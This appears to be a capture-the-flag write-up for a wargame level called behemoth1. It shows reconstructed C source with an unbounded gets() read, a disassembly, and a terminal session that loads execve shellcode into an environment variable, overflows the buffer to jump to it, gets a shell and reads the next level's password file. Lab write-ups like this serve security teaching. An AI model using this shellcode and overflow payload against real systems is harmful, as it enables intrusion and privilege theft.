behemoth - 01

#include <stdio.h>

/*
 * Reconstructed source of the target binary: prompts for a password, reads
 * one line from stdin, then prints a failure message and exits.
 *
 * argc and argv are not used. The input is never compared with anything,
 * so the failure message is printed for every input and the program always
 * returns 0.
 *
 * Security note: the read is done with gets(), which has no length
 * parameter. This listing is kept as-is because it is the specimen under
 * study; the fix is a bounded read such as fgets(buf, sizeof buf, stdin).
 */
int main(int argc, char *argv[])
{
	/* Fixed 64-byte local buffer; the disassembly on this page places it
	 * at 0x1d(%esp) inside main's stack frame. */
	char buf[64];

	/* No trailing newline and no fflush(), so the prompt may still be
	 * buffered when stdout is not a terminal. */
	printf("Password: ");

	/* gets() copies bytes until newline or EOF without checking the size
	 * of buf, so a line longer than 63 characters is written past the end
	 * of the array into the rest of the stack frame (CWE-242 / CWE-121).
	 * gets() was removed from the language in C11 for this reason.
	 * Compiler stack protectors, a non-executable stack and ASLR reduce
	 * the impact but do not remove the out-of-bounds write. */
	gets(buf);

	/* Printed unconditionally: buf is never inspected after the read. */
	puts("Authentication failure.\nSorry.");

	return 0;
}



root@today:~# ssh [email protected]

[email protected]'s password: aesebootiv

behemoth1@melinda:~$ cd /tmp/shui1

behemoth1@melinda:/tmp/shui1$ ls
env  env.c  sleep

behemoth1@melinda:/tmp/shui1$ export EGG=$(python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"')

behemoth1@melinda:/tmp/shui1$ ./env EGG /behemoth/behemoth1
0xffffd89a

behemoth1@melinda:/tmp/shui1$ (python -c 'print "U"*79 + "\x9a\xd8\xff\xff"'; cat) | /behemoth/behemoth1
Password: Authentication failure.
Sorry.
whoami
behemoth2
cat /etc/behemoth_pass/behemoth2
eimahquuof


   ┌─────────────────────────────────────────────────────────────────────────────────┐
   │0x804845d <main>                push   %ebp                                      │
   │0x804845e <main+1>              mov    %esp,%ebp                                 │
   │0x8048460 <main+3>              and    $0xfffffff0,%esp                          │
   │0x8048463 <main+6>              sub    $0x60,%esp                                │
   │0x8048466 <main+9>              movl   $0x8048530,(%esp)                         │
   │0x804846d <main+16>             call   0x8048310 <printf@plt>                    │
   │0x8048472 <main+21>             lea    0x1d(%esp),%eax                           │
   │0x8048476 <main+25>             mov    %eax,(%esp)                               │
   │0x8048479 <main+28>             call   0x8048320 <gets@plt>                      │
   │0x804847e <main+33>             movl   $0x804853c,(%esp)                         │
   │0x8048485 <main+40>             call   0x8048330 <puts@plt>                      │
   │0x804848a <main+45>             mov    $0x0,%eax                                 │
   │0x804848f <main+50>             leave                                            │
   │0x8048490 <main+51>             ret                                              │
   └─────────────────────────────────────────────────────────────────────────────────┘

